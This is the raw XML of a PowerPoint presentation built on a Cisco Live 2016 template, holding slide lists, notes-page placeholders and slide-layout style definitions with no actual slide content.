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3.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4"/>
    <p:sldMasterId id="2147483699" r:id="rId5"/>
    <p:sldMasterId id="2147483745" r:id="rId6"/>
    <p:sldMasterId id="2147483791" r:id="rId7"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId56"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="661" r:id="rId8"/>
    <p:sldId id="426" r:id="rId9"/>
    <p:sldId id="518" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="360" r:id="rId12"/>
    <p:sldId id="358" r:id="rId13"/>
    <p:sldId id="362" r:id="rId14"/>
    <p:sldId id="359" r:id="rId15"/>
    <p:sldId id="363" r:id="rId16"/>
    <p:sldId id="658" r:id="rId17"/>
    <p:sldId id="433" r:id="rId18"/>
    <p:sldId id="655" r:id="rId19"/>
    <p:sldId id="437" r:id="rId20"/>
    <p:sldId id="438" r:id="rId21"/>
    <p:sldId id="402" r:id="rId22"/>
    <p:sldId id="403" r:id="rId23"/>
    <p:sldId id="410" r:id="rId24"/>
    <p:sldId id="404" r:id="rId25"/>
    <p:sldId id="659" r:id="rId26"/>
    <p:sldId id="407" r:id="rId27"/>
    <p:sldId id="405" r:id="rId28"/>
    <p:sldId id="406" r:id="rId29"/>
    <p:sldId id="663" r:id="rId30"/>
    <p:sldId id="409" r:id="rId31"/>
    <p:sldId id="451" r:id="rId32"/>
    <p:sldId id="703" r:id="rId33"/>
    <p:sldId id="684" r:id="rId34"/>
    <p:sldId id="685" r:id="rId35"/>
    <p:sldId id="686" r:id="rId36"/>
    <p:sldId id="687" r:id="rId37"/>
    <p:sldId id="688" r:id="rId38"/>
    <p:sldId id="664" r:id="rId39"/>
    <p:sldId id="669" r:id="rId40"/>
    <p:sldId id="670" r:id="rId41"/>
    <p:sldId id="671" r:id="rId42"/>
    <p:sldId id="672" r:id="rId43"/>
    <p:sldId id="673" r:id="rId44"/>
    <p:sldId id="674" r:id="rId45"/>
    <p:sldId id="675" r:id="rId46"/>
    <p:sldId id="676" r:id="rId47"/>
    <p:sldId id="678" r:id="rId48"/>
    <p:sldId id="679" r:id="rId49"/>
    <p:sldId id="680" r:id="rId50"/>
    <p:sldId id="682" r:id="rId51"/>
    <p:sldId id="683" r:id="rId52"/>
    <p:sldId id="681" r:id="rId53"/>
    <p:sldId id="278" r:id="rId54"/>
    <p:sldId id="281" r:id="rId55"/>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99"/>
    <p:restoredTop sz="96530" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="171" d="100"/>
          <a:sy n="171" d="100"/>
        </p:scale>
        <p:origin x="448" y="16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6F0CEBA6-DC63-41D2-8160-75539321983D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/26/20</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92E2798C-C78A-4BF8-AD3C-36B8B474C43A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505668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0854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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3101996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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244610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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2973827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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2686017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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="924315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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563893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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="776668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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089062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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310979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E2798C-C78A-4BF8-AD3C-36B8B474C43A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267145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1B65C6-46AD-064E-B7A0-4F281D2996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81813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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2722676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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1407069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E2798C-C78A-4BF8-AD3C-36B8B474C43A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564418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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2965026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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421461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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="784922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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16913919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E2798C-C78A-4BF8-AD3C-36B8B474C4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22540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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20426866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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2251859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1B65C6-46AD-064E-B7A0-4F281D2996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5047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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2349866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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1439367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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628466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E2798C-C78A-4BF8-AD3C-36B8B474C4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86650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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="869632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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18023973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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1739923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1B65C6-46AD-064E-B7A0-4F281D2996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1393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1B65C6-46AD-064E-B7A0-4F281D2996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274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1B65C6-46AD-064E-B7A0-4F281D2996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2262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1B65C6-46AD-064E-B7A0-4F281D2996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9028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BFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2408078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BBFF4-3870-4421-A2C2-2AEF721882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Date Placeholder 7"/>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F58ED2-806F-CB40-B78F-9BC49A599F59}"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26/10/2020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Header Placeholder 8"/>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Cisco Live 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="683854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Layouts/_rels/slideLayout1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7.gif"/></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7.gif"/></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Layouts/_rels/slideLayout1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7.gi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gi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Layouts/_rels/slideLayout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7.gif"/></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7.gif"/></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69496" y="3856736"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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6" y="4072669"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="18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6" y="4348762"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="18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2" y="3043653"/>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1"/>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5"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solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>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 name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66651854-3E9D-3744-B697-F78506784448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>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3854225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200" indent="-165100">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800" indent="-109538">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="911035" indent="-171415">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1082450" indent="-168240">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79140065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76729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1_Bullet_with_Code">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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755866" y="1205898"/>
            <a:ext cx="3886200" cy="3083094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="45710" rIns="0" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="57149" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="174621" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="288918" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="403215" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="517512" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Code</a:t>
            </a:r>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402680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46455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83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347789"/>
            <a:ext cx="8115300"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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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80544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9"/>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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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20623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9"/>
            <a:ext cx="8280057" cy="3073946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="285683" marR="0" indent="-285683" algn="ctr" defTabSz="457094"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US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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420065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_Half_Page_Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="1665183"/>
            <a:ext cx="3662024" cy="2925868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174621" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="288918" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403215" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="517512" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="631809" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
